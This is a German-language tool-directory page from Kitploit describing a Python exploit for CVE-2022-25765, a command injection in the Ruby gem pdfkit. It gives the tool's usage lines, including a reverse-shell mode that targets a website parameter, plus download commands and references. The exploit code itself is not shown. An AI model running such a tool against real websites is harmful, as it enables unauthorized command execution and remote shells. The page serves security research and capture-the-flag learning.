Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/unicordev/exploit-cve-2022-25765
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & Bildung
GitHubunicordev/exploit-cve-2022-25765

exploit-CVE-2022-25765

Exploit für CVE-2022–25765 (pdfkit) - Befehlseinschleusung

Repository anzeigen
314vor 11 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Exploit für CVE-2022-25765 (pdfkit) - Command Injection

GitHub CVE Cover

Gefällt dir dieses Repo? Gib uns einen ⭐!

Nur für Bildungszwecke und autorisierte Sicherheitsforschung.

Exploit-Autor

@UNICORDev von (@NicPWNs und @Dev-Yeoj)

Beschreibung der Sicherheitslücke

Das Paket pdfkit ab Version 0.0.0 ist anfällig für Command Injection, da die URL nicht ordnungsgemäß bereinigt wird.

Beschreibung des Exploits

Ein Ruby-Gem pdfkit wird häufig verwendet, um Webseiten oder HTML in PDF-Dokumente zu konvertieren. Anfällige Versionen (< 0.8.7.2) dieser Software können eine speziell präparierte URL übergeben bekommen, die einen auszuführenden Befehl enthält. Dieser Exploit erzeugt ausführbare URLs oder sendet sie an eine anfällige Website, die pdfkit verwendet.

Verwendung

root@kitploit:~
  python3 exploit-CVE-2022–25765.py -c <command>
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -h

Optionen

root@kitploit:~
  -c    Benutzerdefinierter Befehlsmodus. Befehl angeben, um benutzerdefiniertes Payload zu generieren.
  -s    Reverse-Shell-Modus. Geben Sie die lokale IP und den Port an, um das Reverse-Shell-Payload zu generieren.
  -w    URL der Website, die die anfällige Version von pdfkit ausführt. (Optional)
  -p    POST-Parameter auf der Website, die die anfällige Version von pdfkit ausführt. (Optional)
  -h    Zeigt dieses Hilfemenü an.

Download

exploit-CVE-2022-25765.py von GitHub herunterladen

exploit-CVE-2022-25765.py von ExploitDB herunterladen

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 51293

Voraussetzungen für den Exploit

  • python3
  • python3:requests
  • python3:urllib3

Demo

Benutzerdefinierter Befehlsmodus

cropped command

Reverse Shell an Zielwebsite gesendet

exploit-CVE-2022–25765

Getestet mit

pdfkit Version 0.8.6

Gültig für

pdfkit Versionen < 0.8.7.2

Testumgebung

root@kitploit:~
gem install pdfkit -v 0.8.6

Quellenangaben

  • https://nvd.nist.gov/vuln/detail/CVE-2022-25765
  • https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
  • https://app.hackthebox.com/machines/Precious
  • https://www.exploit-db.com/exploits/51293
Tool herunterladen